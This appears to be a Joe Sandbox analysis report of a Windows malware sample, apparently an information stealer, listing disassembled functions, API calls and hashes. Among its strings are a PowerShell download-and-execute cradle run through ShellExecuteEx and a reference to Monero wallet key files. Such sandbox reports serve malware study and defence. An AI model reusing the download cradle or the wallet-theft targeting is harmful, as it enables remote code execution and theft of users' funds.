                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID: CurrentBuildNumber
                                    • API String ID: 3225020163-1022791448
                                    • Opcode ID: 7616cc022dca427d8fd97e1a8e2f7054dad8cb83f6d2fbff320e7468c21437ea
                                    • Instruction ID: f1a499277e3072dd450651bea3495f1d5e4ed5786531fb386c1ba75d4ffbf6a9
                                    • Opcode Fuzzy Hash: 7616cc022dca427d8fd97e1a8e2f7054dad8cb83f6d2fbff320e7468c21437ea
                                    • Instruction Fuzzy Hash: 2A0117B9A40308BBE700DBE4DC49FAEB7B8EB48705F104555FA05A7291DA745A04CB61
                                    Function 009499C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009499EC
                                    • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00949A11
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00949A31
                                    • ReadFile.KERNEL32(000000FF,?,00000000,0094148F,00000000), ref: 00949A5A
                                    • LocalFree.KERNEL32(0094148F), ref: 00949A90
                                    • CloseHandle.KERNEL32(000000FF), ref: 00949A9A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                    • String ID:
                                    • API String ID: 2311089104-0
                                    • Opcode ID: 8072e2c8defae77b3cac3b5ea810d88338b108485bf4024978a4381feba364e7
                                    • Instruction ID: bbf619b944364765def30f9c11d6147a5dca2a28490d4112520359f5671771c8
                                    • Opcode Fuzzy Hash: 8072e2c8defae77b3cac3b5ea810d88338b108485bf4024978a4381feba364e7
                                    • Instruction Fuzzy Hash: A2312BB4A00209EFDF14CF94C985FAE77B9FF48341F108159E911A72A0DB78AA41CFA1
                                    Function 00954780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrcat.KERNEL32(?,015EDE68), ref: 009547DB
                                      • Part of subcall function 00958DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00958E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00954801
                                    • lstrcat.KERNEL32(?,?), ref: 00954820
                                    • lstrcat.KERNEL32(?,?), ref: 00954834
                                    • lstrcat.KERNEL32(?,015DB1A8), ref: 00954847
                                    • lstrcat.KERNEL32(?,?), ref: 0095485B
                                    • lstrcat.KERNEL32(?,015ED038), ref: 0095486F
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 00958D90: GetFileAttributesA.KERNEL32(00000000,?,00941B54,?,?,0096564C,?,?,00960E1F), ref: 00958D9F
                                      • Part of subcall function 00954570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00954580
                                      • Part of subcall function 00954570: RtlAllocateHeap.NTDLL(00000000), ref: 00954587
                                      • Part of subcall function 00954570: wsprintfA.USER32 ref: 009545A6
                                      • Part of subcall function 00954570: FindFirstFileA.KERNEL32(?,?), ref: 009545BD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                    • String ID:
                                    • API String ID: 2540262943-0
                                    • Opcode ID: 983bf6f25e42a30b1a0d02514fae3bf4067935cd6227c1035233b60aa10df8a6
                                    • Instruction ID: a6db1f9bf260ffdc88fdfc4cffcdb503b8ddbcf2e3c3e4549b3ec9d58358368d
                                    • Opcode Fuzzy Hash: 983bf6f25e42a30b1a0d02514fae3bf4067935cd6227c1035233b60aa10df8a6
                                    • Instruction Fuzzy Hash: BC3164B290020897DB14FBB0DC85FEE737CAB98701F404989B715A7091EE74A78DCBA5
                                    Function 00952C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00952D85
                                    Strings
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00952D04
                                    • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00952CC4
                                    • <, xrefs: 00952D39
                                    • ')", xrefs: 00952CB3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                    • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    • API String ID: 3031569214-898575020
                                    • Opcode ID: 8071116be20139ea33d522b333c7f76899603bbf38da60a4351f52079f5d7c5a
                                    • Instruction ID: 72a6ed190e757eb76af4b02fe1f736549c90268fd2eb4951f56fbde672a24c76
                                    • Opcode Fuzzy Hash: 8071116be20139ea33d522b333c7f76899603bbf38da60a4351f52079f5d7c5a
                                    • Instruction Fuzzy Hash: 5341BF71C102089ADB14EFA1C892BDDBB78BF94301F404219F916A7191EF746A4ECF99
                                    Function 00949E10 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 170memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00949F41
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$AllocLocal
                                    • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                    • API String ID: 4171519190-1096346117
                                    • Opcode ID: 62faf944703c54f76b1a3b2dfe90e90b70067198c2c7d23e148942d941b51eae
                                    • Instruction ID: 7a1206747a8083820e70009e6e43c24797dbb96b28c1f5a649005efa38cd8fec
                                    • Opcode Fuzzy Hash: 62faf944703c54f76b1a3b2dfe90e90b70067198c2c7d23e148942d941b51eae
                                    • Instruction Fuzzy Hash: 3A615F70A00248DFDB24EFA5CC96FEE7779AF85304F008118F90A5F191EB746A4ACB56
                                    Function 009540B0 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,015ED1F8,00000000,00020119,?), ref: 009540F4
                                    • RegQueryValueExA.ADVAPI32(?,015EDF10,00000000,00000000,00000000,000000FF), ref: 00954118
                                    • RegCloseKey.ADVAPI32(?), ref: 00954122
                                    • lstrcat.KERNEL32(?,00000000), ref: 00954147
                                    • lstrcat.KERNEL32(?,015EDE20), ref: 0095415B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$CloseOpenQueryValue
                                    • String ID:
                                    • API String ID: 690832082-0
                                    • Opcode ID: 2477c6f065ad15c8244c8e51633646b96535fcaefeb28ce8c0b436a5d5517e9f
                                    • Instruction ID: 6bb49f28af572fba63f2e3c0ec1c84173c2ec62812f82749bd0815cdbca50493
                                    • Opcode Fuzzy Hash: 2477c6f065ad15c8244c8e51633646b96535fcaefeb28ce8c0b436a5d5517e9f
                                    • Instruction Fuzzy Hash: A5418AB6D101086BEB14EBA0DC56FFE737DAB88300F008559B71657191EE755B8CCBA2
                                    Function 00956920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 0095696C
                                    • sscanf.NTDLL ref: 00956999
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009569B2
                                    • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 009569C0
                                    • ExitProcess.KERNEL32 ref: 009569DA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Time$System$File$ExitProcesssscanf
                                    • String ID:
                                    • API String ID: 2533653975-0
                                    • Opcode ID: 9c482c0168f0659151cc4bb455c789106be8e9560f69240d1c06ccea599fd14f
                                    • Instruction ID: e74d823d2457101789c08a10f3a291a9803ed55dc5ad506a7de0303156fde582
                                    • Opcode Fuzzy Hash: 9c482c0168f0659151cc4bb455c789106be8e9560f69240d1c06ccea599fd14f
                                    • Instruction Fuzzy Hash: 6721FAB5D00209ABDF04EFE4D955AEEB7B9FF48301F04852EE506E3250EB345608CBA9
                                    Function 00957E00 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00957E37
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00957E3E
                                    • RegOpenKeyExA.ADVAPI32(80000002,015DB770,00000000,00020119,?), ref: 00957E5E
                                    • RegQueryValueExA.ADVAPI32(?,015ED3F8,00000000,00000000,000000FF,000000FF), ref: 00957E7F
                                    • RegCloseKey.ADVAPI32(?), ref: 00957E92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: f0bf866f47819bf70edc87d35f8cbad2313d41be84b4ec0792013f3c06385bf3
                                    • Instruction ID: c21753fd7d68b89361adf605a1cea1c1637b0096e27aeab488edfa7c2dd4971d
                                    • Opcode Fuzzy Hash: f0bf866f47819bf70edc87d35f8cbad2313d41be84b4ec0792013f3c06385bf3
                                    • Instruction Fuzzy Hash: 97114FB1A44205EBE710CFD5ED4AF7BBBB8EB44711F10415AFA05A72A0DB785904CBA1
                                    Function 00959260 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • StrStrA.SHLWAPI(015EDD48,?,?,?,0095140C,?,015EDD48,00000000), ref: 0095926C
                                    • lstrcpyn.KERNEL32(00B8AB88,015EDD48,015EDD48,?,0095140C,?,015EDD48), ref: 00959290
                                    • lstrlen.KERNEL32(?,?,0095140C,?,015EDD48), ref: 009592A7
                                    • wsprintfA.USER32 ref: 009592C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpynlstrlenwsprintf
                                    • String ID: %s%s
                                    • API String ID: 1206339513-3252725368
                                    • Opcode ID: 701a66744233baa2b0c4b1a81af4105e23fb30bc6b3efab63370b3a7598e739a
                                    • Instruction ID: a085fcf767dbab2419cc47f04fa54459bcf8541e3db12ac857622a7bf348b247
                                    • Opcode Fuzzy Hash: 701a66744233baa2b0c4b1a81af4105e23fb30bc6b3efab63370b3a7598e739a
                                    • Instruction Fuzzy Hash: 1701DE75500208FFEB04DFECC984EAE7BB9EB48355F108549F9099B215CA35EE41DB91
                                    Function 009412A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009412B4
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 009412BB
                                    • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009412D7
                                    • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009412F5
                                    • RegCloseKey.ADVAPI32(?), ref: 009412FF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                    • String ID:
                                    • API String ID: 3225020163-0
                                    • Opcode ID: 1bd674564feb5975785fa47b7362acaf5b93b393be4e795b547c0e40df65d39d
                                    • Instruction ID: 685c23ea30635811eb6e81ab45cf303ad788ad43975526b231c5d4a7dd4cb44f
                                    • Opcode Fuzzy Hash: 1bd674564feb5975785fa47b7362acaf5b93b393be4e795b547c0e40df65d39d
                                    • Instruction Fuzzy Hash: 180136B9A40208BBEB00DFD0DC49FAEB7BCEB48701F008155FA05D7290DA749A01DF51
                                    Function 0095C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
